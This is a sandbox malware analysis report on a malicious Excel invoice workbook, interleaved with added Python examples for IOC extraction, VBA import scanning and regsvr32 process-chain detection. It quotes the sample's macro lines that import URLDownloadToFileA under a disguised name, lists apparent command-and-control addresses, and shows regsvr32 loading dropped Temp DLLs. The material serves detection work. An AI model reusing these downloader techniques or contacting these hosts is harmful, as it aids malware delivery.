Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown | Network traffic detected: HTTP traffic on port 49228 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49198 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49282 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49194 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49259 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49251 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49206
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49247
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49202
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49288
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49320
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown | Network traffic detected: HTTP traffic on port 49202 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49263 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49318 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49282
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49281
Source: unknown | Network traffic detected: HTTP traffic on port 49206 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49239 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49319
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49318
Source: unknown | Network traffic detected: HTTP traffic on port 49235 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49239
Source: unknown | Network traffic detected: HTTP traffic on port 49250 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49237
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49314
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49235
Source: unknown | Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49198
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49275
Source: unknown | Network traffic detected: HTTP traffic on port 49300 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49247 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49194
Source: unknown | Network traffic detected: HTTP traffic on port 49222 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49264 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49270
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49191
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49190
Source: unknown | Network traffic detected: HTTP traffic on port 49314 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49229 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49320 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49211 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49307 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49270 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49307
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49229
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49228
Source: unknown | HTTPS traffic detected: 64.37.52.172:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 103.83.81.27:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 198.136.54.91:443 -> 192.168.2.22:49184 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 192.185.224.50:443 -> 192.168.2.22:49191 version: TLS 1.2
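The memory-string rows above name the same three hosts many times, once per memory dump and with different trailing characters after the URL, and they mix in a certificate-policy URL that a TLS client holds in memory because it parsed a certificate chain, not because it connected to it. The four HTTPS rows, by contrast, are observed flows to hosts that do not appear among the strings. The following Python is an added example, not part of the Joe Sandbox report: it reduces rows of this shape to a deduplicated host:port list, separates hosts with an observed TLS flow from hosts that only appear as strings, and flags ports other than 80 and 443. The sample rows are condensed copies of rows from the report above; treating secure.comodo.com as certificate noise and the port rule are the author's assumptions.

```python
"""Reduce sandbox 'String found in binary or memory' and 'HTTPS traffic
detected' rows to a deduplicated network IOC list.

Added example; not part of the Joe Sandbox report. The sample rows are
condensed copies of rows from the report; the noise list and the port rule
are the author's assumptions.
"""
import re
from urllib.parse import urlsplit

MEMORY_URL_RE = re.compile(r"String found in binary or memory: (https?://\S+)")
DUMP_RE = re.compile(
    r"[0-9A-F]{8}\.[0-9A-F]{8}\.\d+\.[0-9A-F]{16}\.[0-9A-F]{8}\.[0-9A-F]{8}\.sdmp"
)
TLS_ROW_RE = re.compile(
    r"HTTPS traffic detected: (?P<server>[\d.]+):(?P<sport>\d+) -> "
    r"(?P<client>[\d.]+):(?P<cport>\d+) version: (?P<ver>TLS [\d.]+)"
)

# Hosts that end up in a TLS client's memory because it parsed a certificate,
# not because it spoke to them. The '0' after .../CPS in the report row is the
# DER byte that follows the CPS URI inside the certificate (author's reading).
CERT_NOISE_HOSTS = {"secure.comodo.com"}

# Constructed sample: condensed copies of rows from the report above.
MEMORY_ROWS = [
    "Source: regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp"
    " | String found in binary or memory: https://198.57.200.100:3786/&",
    "Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp"
    " | String found in binary or memory: https://198.57.200.100:3786/XE",
    "Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp"
    " | String found in binary or memory: https://211.110.44.63/",
    "Source: regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp"
    " | String found in binary or memory: https://211.110.44.63:5353/",
    "Source: regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp"
    " | String found in binary or memory: https://69.164.207.140:3388/hy",
    "Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp"
    " | String found in binary or memory: https://secure.comodo.com/CPS0",
]
TLS_ROWS = [
    "Source: unknown | HTTPS traffic detected: 64.37.52.172:443 -> 192.168.2.22:49165 version: TLS 1.2",
    "Source: unknown | HTTPS traffic detected: 103.83.81.27:443 -> 192.168.2.22:49169 version: TLS 1.2",
    "Source: unknown | HTTPS traffic detected: 198.136.54.91:443 -> 192.168.2.22:49184 version: TLS 1.2",
    "Source: unknown | HTTPS traffic detected: 192.185.224.50:443 -> 192.168.2.22:49191 version: TLS 1.2",
]


def parse_memory_row(row):
    """Return (host, port, [dump ids]) for a memory-string row, else None.

    The path is deliberately dropped: strings carved from process memory
    carry whatever bytes followed the URL ('&', 'XE', 'hy' above), so only
    host and port are stable enough to key on.
    """
    m = MEMORY_URL_RE.search(row)
    if not m:
        return None
    parts = urlsplit(m.group(1))
    port = parts.port or (443 if parts.scheme == "https" else 80)
    return parts.hostname, port, DUMP_RE.findall(row)


def extract_iocs(rows, noise_hosts=CERT_NOISE_HOSTS):
    """Deduplicate memory-string rows into {(host, port): info}."""
    iocs = {}
    for row in rows:
        parsed = parse_memory_row(row)
        if parsed is None:
            continue
        host, port, dumps = parsed
        if host in noise_hosts:
            continue
        info = iocs.setdefault(
            (host, port), {"nonstandard_port": port not in (80, 443), "dumps": set()}
        )
        info["dumps"].update(dumps)
    return iocs


def extract_tls_servers(rows):
    """Return {(server_ip, port)} for every observed TLS flow."""
    return {(m["server"], int(m["sport"])) for m in map(TLS_ROW_RE.search, rows) if m}


def split_by_evidence(memory_rows, tls_rows):
    """Separate hosts by the kind of evidence the sandbox has for them."""
    strings = set(extract_iocs(memory_rows))
    flows = extract_tls_servers(tls_rows)
    return {
        "flow_and_string": sorted(strings & flows),
        "strings_only": sorted(strings - flows),
        "flow_only": sorted(flows - strings),
    }


if __name__ == "__main__":
    for key, info in sorted(extract_iocs(MEMORY_ROWS).items()):
        flag = " (non-standard port)" if info["nonstandard_port"] else ""
        print(f"{key[0]}:{key[1]}{flag} seen in {len(info['dumps'])} dump(s)")
    for bucket, hosts in split_by_evidence(MEMORY_ROWS, TLS_ROWS).items():
        print(bucket, hosts)
```

On the sample rows this yields four string-only host:port pairs (three of them on ports 3786, 5353 and 3388) and four flow-only hosts on 443, with no overlap. The split is worth preserving when writing block rules: the flow-only hosts were actually contacted during the run, while the string-only hosts are configuration carried by the regsvr32.exe payloads and may never have been reached in the sandbox window.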

System Summary:

Document contains an embedded VBA macro which may execute processes
Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function Print_Sheet_MAin, API Run("MegaA_sp")
Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function Print_Sheet_MAin, API Run("MegaA_sp")
Document contains an embedded VBA macro with suspicious strings
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm | OLE, VBA macro line: Private Declare PtrSafe Function PrintData_1 Lib "urlmon" Alias "URLDownloadToFileA" ( ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As LongPtr, ByVal lpfnCB As LongPtr ) As Long
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm | OLE, VBA macro line: Private Declare PtrSafe Function PrintData_1 Lib "urlmon" Alias "URLDownloadToFileA" ( ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As LongPtr, ByVal lpfnCB As LongPtr ) As Long
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm | OLE, VBA macro line: Private Declare Function PrintData_1 Lib "urlmon" Alias "URLDownloadToFileA" ( ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long ) As Long
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm | OLE, VBA macro line: Private Declare Function PrintData_1 Lib "urlmon" Alias "URLDownloadToFileA" ( ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long ) As Long
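Both Declare lines bind urlmon!URLDownloadToFileA under the innocuous local name PrintData_1, once in the 64-bit form (PtrSafe, LongPtr) and once in the 32-bit form, which is the pattern a #If VBA7 conditional-compilation block produces so the macro runs on either Office bitness. A scanner that keys on the local function name misses this; what matters is the Lib and the Alias. The following Python is an added example, not the report's tooling or the sample's own code: the first two Declare lines in the sample are the ones quoted above, the other two lines and the watch list are constructed by the author.

```python
"""Find Win32 imports that a VBA module declares under a misleading local name.

Added example; not the report's tooling or the sample's code. The two
URLDownloadToFileA Declare lines are the ones the report quotes; the Sleep
and ShellExecuteA lines and the watch list are constructed by the author.
"""
import re

DECLARE_RE = re.compile(
    r"""Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(?P<local>\w+)\s+
        Lib\s+"(?P<lib>[^"]+)"\s*(?:Alias\s+"(?P<alias>[^"]+)")?""",
    re.IGNORECASE | re.VERBOSE,
)

# (library, exported name) -> why it matters. Keys are lower-case.
WATCHED = {
    ("urlmon", "urldownloadtofilea"): "download to disk",
    ("urlmon", "urldownloadtofilew"): "download to disk",
    ("shell32", "shellexecutea"): "process start",
    ("shell32", "shellexecutew"): "process start",
    ("kernel32", "winexec"): "process start",
    ("kernel32", "createprocessa"): "process start",
    ("kernel32", "createprocessw"): "process start",
    ("kernel32", "virtualalloc"): "in-process shellcode",
    ("kernel32", "createthread"): "in-process shellcode",
}

# Constructed sample: the report's two Declare lines (64-bit and 32-bit
# branches of the same import) plus a benign Sleep import and an import that
# keeps its real name.
SAMPLE_VBA = r'''
#If VBA7 Then
Private Declare PtrSafe Function PrintData_1 Lib "urlmon" Alias "URLDownloadToFileA" ( ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As LongPtr, ByVal lpfnCB As LongPtr ) As Long
Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
#Else
Private Declare Function PrintData_1 Lib "urlmon" Alias "URLDownloadToFileA" ( ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long ) As Long
Private Declare Function ShellExecuteA Lib "shell32.dll" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
#End If
'''


def normalize_lib(lib):
    """'urlmon', 'urlmon.dll' and a full path to urlmon.dll all map to 'urlmon'."""
    base = lib.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return base[:-4] if base.endswith(".dll") else base


def scan_vba(src):
    """Return one finding per Declare whose real export is on the watch list."""
    findings = []
    for m in DECLARE_RE.finditer(src):
        lib = normalize_lib(m["lib"])
        real = m["alias"] or m["local"]  # Alias wins: it is what gets linked
        why = WATCHED.get((lib, real.lower()))
        if why is None:
            continue
        findings.append({
            "local": m["local"],
            "lib": lib,
            "real": real,
            "why": why,
            # A renamed import is the stronger signal: there is no legitimate
            # reason to call URLDownloadToFileA "PrintData_1".
            "renamed": m["alias"] is not None
            and m["alias"].lower() != m["local"].lower(),
        })
    return findings


if __name__ == "__main__":
    for f in scan_vba(SAMPLE_VBA):
        tag = "RENAMED " if f["renamed"] else ""
        print(f"{tag}{f['lib']}!{f['real']} as {f['local']}: {f['why']}")
```

The scanner reports the two renamed URLDownloadToFileA imports and the un-renamed ShellExecuteA, and ignores Sleep. The same Lib/Alias logic applies to the Excel 4.0 CALL formulas listed next: there the DLL and export name are the first two arguments of CALL rather than a Declare statement, but the local name is again irrelevant to what gets executed.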
Found Excel 4.0 Macro with suspicious formulas
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm | Initial sample: CALL
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm | Initial sample: CALL
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm | Initial sample: CALL
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm | Initial sample: CALL
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\hknmwj[1].zip
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\gjeicn6u9[1].rar
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\clh6qq[1].zip
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\kxwni.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\l3v7tq4[1].rar
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\or3peb[1].rar
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Process Stats: CPU usage > 98%
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: 76D20000 page execute and read and write
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm | OLE, VBA macro line: Private Sub World_time_Print_Layout(ByVal Index As Long)
Source: VBA code instrumentation | OLE, VBA macro: Module Sheet1, Function World_time_Print_Layout
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm | OLE indicator, VBA macros: true
Source: classification engine | Classification label: mal100.expl.evad.winXLSM@31/24@6/9
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$1_Total New Invoices-Thursday January 21_2021.xlsm
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRE3D9.tmp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\SysWOW64\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm | Virustotal: Detection: 27%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\uveoybvk.dll
Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\kxwni.dll
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jxacpz.dll
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\uveoybvk.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jxacpz.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\kxwni.dll
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
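Two patterns stand out in the process rows: EXCEL.EXE starting regsvr32.exe -s on a DLL in the user's Temp directory, and the 64-bit System32\regsvr32.exe immediately starting the SysWOW64 copy with the same DLL. The second hop is regsvr32's own behaviour when it is handed a 32-bit DLL on 64-bit Windows (it re-executes the 32-bit copy with the same arguments), so a rule that fires on regsvr32 spawning regsvr32 is noisy on its own; the signal is the Office grandparent and the user-writable path, which is why the 32-bit child should be judged by the process that really started the chain. The following Python is an added example in the spirit of the Sigma rules the report names, not those rules themselves: the events are constructed from the rows above with invented pids, and the msiexec installer chain is a constructed benign control.

```python
"""Score regsvr32.exe process creations: an Office parent and a DLL in a
user-writable directory, while treating the 64-bit to 32-bit regsvr32 hop
as the relaunch it is.

Added example, not the Sigma rules the report names. Events are constructed
from the report's rows with invented pids; the msiexec chain is a benign
control constructed by the author.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
USER_WRITABLE = re.compile(
    r"\\(?:AppData\\Local\\Temp|Users\\[^\\]+\\(?:Downloads|Desktop|Public)"
    r"|Windows\\Temp|ProgramData)\\",
    re.IGNORECASE,
)

SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
              r"'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding"),
    ProcEvent(200, 100, r"C:\Windows\System32\regsvr32.exe",
              r"'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll"),
    ProcEvent(201, 200, r"C:\Windows\SysWOW64\regsvr32.exe",
              r"-s C:\Users\user\AppData\Local\Temp\kxwni.dll"),
    ProcEvent(300, 100, r"C:\Windows\System32\regsvr32.exe",
              r"'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll"),
    ProcEvent(301, 300, r"C:\Windows\SysWOW64\regsvr32.exe",
              r"-s C:\Users\user\AppData\Local\Temp\sxzjqf.dll"),
    # Benign control (constructed): an installer registering its own 32-bit DLL.
    ProcEvent(400, 1, r"C:\Windows\System32\msiexec.exe", r"msiexec.exe /i setup.msi"),
    ProcEvent(401, 400, r"C:\Windows\System32\regsvr32.exe",
              r"regsvr32.exe /s 'C:\Program Files\Vendor\comctl.dll'"),
    ProcEvent(402, 401, r"C:\Windows\SysWOW64\regsvr32.exe",
              r"/s 'C:\Program Files\Vendor\comctl.dll'"),
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_regsvr32(ev):
    return basename(ev.image) == "regsvr32.exe"


def dll_argument(cmdline):
    """Last argument if it names a .dll, honouring a quoted path with spaces."""
    s = cmdline.strip()
    if s and s[-1] in "'\"":
        start = s.rfind(s[-1], 0, len(s) - 1)
        arg = s[start + 1:-1] if start >= 0 else ""
    else:
        arg = s.rsplit(None, 1)[-1] if s else ""
    return arg if arg.lower().endswith(".dll") else None


def silent_flag(cmdline):
    return re.search(r"(?:^|\s)[-/]s\b", cmdline, re.IGNORECASE) is not None


def is_wow64_relaunch(child, parent):
    # 64-bit regsvr32 re-executes the SysWOW64 copy with the same arguments
    # when handed a 32-bit DLL; this pair alone says nothing about intent.
    return (is_regsvr32(child) and is_regsvr32(parent)
            and "\\syswow64\\" in child.image.lower()
            and "\\system32\\" in parent.image.lower()
            and dll_argument(child.cmdline) == dll_argument(parent.cmdline))


def effective_parent(ev, by_pid):
    """Skip the WOW64 relaunch so the 32-bit child is judged by the real starter."""
    parent = by_pid.get(ev.ppid)
    if parent is not None and is_wow64_relaunch(ev, parent):
        return by_pid.get(parent.ppid)
    return parent


def evaluate(events):
    by_pid = {e.pid: e for e in events}
    alerts = []
    for ev in events:
        if not is_regsvr32(ev):
            continue
        parent = effective_parent(ev, by_pid)
        dll = dll_argument(ev.cmdline)
        reasons = []
        if parent is not None and basename(parent.image) in OFFICE_IMAGES:
            reasons.append("office_parent")
        if dll is not None and USER_WRITABLE.search(dll):
            reasons.append("user_writable_dll")
        if reasons:
            alerts.append({"pid": ev.pid, "dll": dll, "reasons": reasons,
                           "silent": silent_flag(ev.cmdline),
                           "effective_parent": parent.image if parent else ""})
    return alerts


if __name__ == "__main__":
    for a in evaluate(SAMPLE_EVENTS):
        print(a["pid"], basename(a["effective_parent"]), a["dll"], a["reasons"])
```

On the constructed events all four regsvr32 instances from the Excel chain alert with both reasons, including the two SysWOW64 children, which are attributed to EXCEL.EXE through the relaunch. The installer's regsvr32 pair produces nothing: its effective parent is msiexec.exe and its DLL lives under Program Files. Note that the report's rows carry no pids, so in a real deployment the parent link has to come from the EDR or Sysmon event, not from the command line.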
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Automated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Automated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Automated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Automated click: OK
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm | Initial sample: OLE zip file path = xl/media/image2.png
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm | Initial sample: OLE zip file path = xl/media/image3.png
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm | Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm | Initial sample: OLE zip file path = xl/worksheets/_rels/sheet3.xml.rels
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings4.bin
